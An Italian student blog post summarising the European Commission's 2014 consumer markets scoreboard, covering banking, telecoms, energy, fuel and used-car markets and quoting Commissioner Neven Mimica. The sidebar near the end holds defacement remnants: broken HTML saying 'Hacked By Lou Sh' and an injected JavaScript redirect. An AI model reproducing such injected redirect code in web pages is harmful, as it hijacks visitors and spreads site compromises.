EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Aggiungere un commento

Buone notizie per i consumatori europei!




Migliorano le condizioni di mercato

Attraverso uno studio del quadro di valutazione dei mercati per i beni di consumo del 2014, sono stati considerati in maniera particolare quattro elementi: comparazione delle offerte, fiducia nelle imprese, problemi, reclami e soddisfazione per le imprese. Lo studio portato avanti dalla Commissione europea segue le prestazioni di ben 52 mercati di consumo che vanno da autoveicoli di seconda mano fino alle residenze per le vacanze.

Cosa si evince dallo studio? Per prima cosa un netto miglioramento per quello che riguarda le prestazioni di mercato: infatti, tra il 2012 e il 2013 il valore globale dei mercati in tutti i paesi è migliorato. Ovviamente bisogna tener conto delle differenza a livello di mercato che esistono tra un paese e l’altro. Comparando i settori dei mercati si è notato che il mercato dei beni ha prestazioni più elevate rispetto a quello dei servizi, anche se la differenza sta cominciando a ridursi.

Nel 2012 si erano ottenuti dei risultati più contenuti per il mercato dei carburanti per i veicoli e dei servizi ferroviari mentre ora entrambi stanno migliorando. Il settore che non migliora da molto tempo è invece quello bancario, dove i prodotti provenienti dagli investimenti ed i mutui sono nelle graduatorie più basse e molto al di sotto della media per il settore dei servizi. L’Ue invece ha come obiettivo proprio per i servizi bancari di migliorare le prestazioni per i consumatori soprattutto per i servizi finanziari.

PNG - 66.9 Kb

Altro settore in cui la soddisfazione dei consumatori e la fiducia sono calati è quello delle telecomunicazioni. In esso infatti ogni giorno arrivano problemi e reclami da risolvere ma questo viene spesso risolto cambiando operatore con estrema facilità. Per agevolare i cittadini europei, la Commissione a partire dal mese di settembre 2013 ha adottato un pacchetto chiamato “Continente connesso” che eliminerà le tariffe in roaming entro il 2016.

Per quello che riguarda i servizi pubblici come energia elettrica e gas, anche qui i risultati non sono dei migliori. Questo a livello di comparazione delle offerte, scelta dei fornitori e in termini di semplicità nel passare da un operatore ad un altro.

Anche il mercato delle automobili di seconda mano non è da meno così come il costo del carburante. Proprio in materia di carburanti un recente studio della Commissione ha dimostrato che i costi variano sensibilmente anche nell’arco della stessa giornata, spostandosi nei vari paesi dell’Ue. I consumatori allora per ovviare al problema spesso fanno riferimento alla rete in cui i siti web confrontano i prezzi dei carburanti.

Quali sono gli obiettivi futuri che la Commissione si prefissa di raggiungere? Avremo due studi accurati sul mercato: il primo farà riferimento al dettaglio dell’energia elettrica per migliorare leggibilità e comprensibilità delle condizioni di contratto per i consumatori. Il secondo invece analizzerà, attraverso dei test comportamentali, le modalità con cui le persone comprendono e leggono le condizioni dei contratti con cui hanno a che fare.

PNG - 68.5 Kb

Nelle parole del Commissario per la politica dei consumatori, Neven Mimica: “Il quadro di valutazione dei mercati dei beni di consumo che pubblichiamo oggi dimostra che, complessivamente, le condizioni di mercato sono sempre più favorevoli ai consumatori. Molto rimane tuttavia da fare, in special modo per i servizi e l’energia. Io e miei colleghi della Commissione stiamo lavorando col massimo impegno per affrontare questi problemi, sia con la direttiva sui conti di pagamento, sia con il pacchetto ’Continente connesso’, nonché agevolando il passaggio da un fornitore all’altro".



Nessun commento
ds Aggiungere un commento

Autori

Vanessa Piacenti
Studentessa del corso di laurea triennale in Scienze della comunicazione, Università si Roma Tor Vergata.

Parole chiave



Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015

© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France